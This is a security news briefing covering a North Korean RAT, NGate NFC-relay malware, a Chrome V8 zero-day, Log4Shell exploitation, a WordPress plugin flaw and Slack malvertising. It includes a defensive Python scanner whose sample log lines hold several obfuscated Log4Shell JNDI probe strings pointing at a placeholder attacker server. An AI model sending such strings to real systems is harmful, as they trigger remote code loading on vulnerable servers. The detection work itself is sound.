Cyware Daily Threat Intelligence

Daily Threat Briefing • August 22, 2024
From a North Korean RAT that’s constantly adapting to evade detection, to a critical Chrome vulnerability and a sneaky malvertising campaign, cyber threats show no signs of slowing down. Researchers identified a new RAT family called MoonPeak, developed by a North Korean group, which is increasingly difficult to detect as it evolves.
Meanwhile, Google patched a high-severity zero-day vulnerability in Chrome’s V8 engine, fixing an issue that could allow attackers to access memory out of bounds.
Additionally, a malvertising campaign has been tricking users searching for Slack, redirecting them to malicious sites and delivering a RAT with stealer capabilities.
MoonPeak: new RAT by North Korean threat cluster
Cisco Talos identified a new RAT family called MoonPeak, based on the open-source XenoRAT malware and actively developed by a North Korean threat cluster tracked as UAT-5394. MoonPeak is evolving incrementally: each new variant introduces changes that make detection harder and that tie the implant to the actor's own infrastructure. The actors have modified XenoRAT's source code, including the C2 communication, so that the implants only work with their servers and rogue or analyst-controlled implants cannot connect.
NGate Android malware steals cash
ESET researchers discovered a sophisticated criminal campaign targeting clients of Czech banks that used a previously unseen Android malware called NGate. The malware relays NFC data from the victim's physical payment card, read by the victim's phone, to the attacker's device, which emulates the card at an ATM to make unauthorized cash withdrawals. The attackers first used phishing and malicious apps to steal banking credentials before deploying NGate. The malware prompts victims to enter sensitive information and to enable NFC and hold their card to the phone, after which the card's NFC traffic is relayed to the attacker in real time.
Chrome 0-day under active exploitation
Google patched a new zero-day vulnerability (CVE-2024-7971) in Chrome that was being exploited in the wild. The high-severity flaw is a type confusion weakness in the V8 JavaScript engine used by Chrome and other Chromium-based browsers. Because V8 is written in C++, a type confusion (code operating on an object as if it were a different type) can lead to out-of-bounds memory access, which attackers chain into code execution. Google released the fix in Chrome 128.0.6613.84/.85 for Windows and Mac and 128.0.6613.84 for Linux; users of other Chromium-based browsers should apply their vendor's corresponding update.
Log4j exploited again!
In a recent incident, a Log4Shell (CVE-2021-44228) exploitation attempt was identified coming from a known Tor exit node. The attackers used the vulnerability to deploy cryptocurrency mining software on compromised systems. The attacks send obfuscated JNDI lookup strings (the familiar ${jndi:ldap://...} pattern, rewritten with nested lookups to evade simple signatures) that cause a vulnerable Log4j instance to query an attacker-controlled LDAP server, which returns a payload that executes a malicious script. That script establishes persistence, gathers system information, and exfiltrates data, while the attackers maintain control through backdoors and encrypted communication channels.
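Obfuscated Log4Shell probes defeat a naive search for the literal string "jndi:ldap". The added example below (written for this briefing, not code from the incident or from any vendor report) normalizes the common evasions before matching: URL encoding, ${lower:x}/${upper:x} case lookups, and the ${::-x} / ${something:-x} default-value trick, applied repeatedly so nested lookups collapse the way Log4j itself would resolve them. The log lines are constructed samples using documentation-range IP addresses; Log4j supports further lookups (for example ${env:...} or ${sys:...} used as prefixes) that this normalizer does not expand, so treat it as a detection aid, not a complete emulator.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines (not from the incident described above): a mix of
# benign requests and Log4Shell probes using obfuscation tricks seen in the wild.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://203.0.113.10:1099/a}"',
    '10.0.0.9 - - "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.10%2Fa%7D HTTP/1.1" 200 "curl/7.8"',
    '10.0.0.7 - - "GET /docs/${env:HOME} HTTP/1.1" 404 "Mozilla/5.0"',
]

# Nested lookups that Log4j resolves before the jndi lookup runs.
# ${::-j} or ${env:NOPE:-j}  ->  j   (default-value syntax)
_DEFAULT_VALUE = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
# ${lower:J} -> j, ${upper:j} -> J  (case-conversion lookups)
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^{}]*)\}")
# The lookup we actually care about, with the protocols JNDI can dispatch to.
_JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|https?)\s*:",
    re.IGNORECASE,
)


def normalize(text: str, max_rounds: int = 10) -> str:
    """Undo URL encoding and collapse nested lookups until the text is stable."""
    for _ in range(max_rounds):
        before = text
        text = unquote(text)
        text = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1) == "lower" else m.group(2).upper(),
            text,
        )
        text = _DEFAULT_VALUE.sub(lambda m: m.group(1), text)
        if text == before:
            break
    return text


def find_jndi(line: str):
    """Return (scheme, normalized_line) if the line carries a JNDI lookup, else None."""
    norm = normalize(line)
    match = _JNDI.search(norm)
    if match is None:
        return None
    return match.group(1).lower(), norm


def scan_log_lines(lines):
    """Scan access-log lines; return one finding per line that carries a JNDI lookup."""
    findings = []
    for index, line in enumerate(lines):
        result = find_jndi(line)
        if result is not None:
            scheme, norm = result
            findings.append({"line": index, "scheme": scheme, "normalized": norm})
    return findings


if __name__ == "__main__":
    for hit in scan_log_lines(SAMPLE_LOG_LINES):
        print(f"line {hit['line']}: jndi via {hit['scheme']} -> {hit['normalized']}")
```

Lines 1 through 4 of the sample are flagged (the plain probe, the lower-case-lookup variant, the default-value variant that resolves to an RMI lookup, and the URL-encoded one), while the benign request and the ${env:HOME} line are not. In practice, run the normalizer over every request header your web tier logs (User-Agent, X-Forwarded-For, Referer and friends), not only the URL, since those are the fields Log4Shell exploits most often targeted.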
Critical bug in another WordPress plugin
The LiteSpeed Cache plugin for WordPress has a critical vulnerability (CVE-2024-28000) that allows unauthenticated users to gain administrator privileges, which in turn lets an attacker install malicious plugins and fully take over the site. The flaw stems from a weak security hash used by the plugin's user simulation (crawler) feature: because the hash is predictable, an attacker can supply it together with an arbitrary user ID and be treated as that user, including an administrator. The issue is fixed in version 6.4; site owners should update immediately, since an unauthenticated privilege escalation in a widely installed plugin is a prime target for mass exploitation.
Suspicious Slack ad for malvertising purposes
A sophisticated malvertising campaign has been targeting users searching for the popular communication tool Slack. The threat actor used Google ads to redirect victims to a decoy page impersonating Slack, which then prompted users to download a malware payload. The campaign involved multiple layers of redirection and cloaking techniques to evade detection. Ultimately, the malware payload was identified as a RAT with stealer capabilities.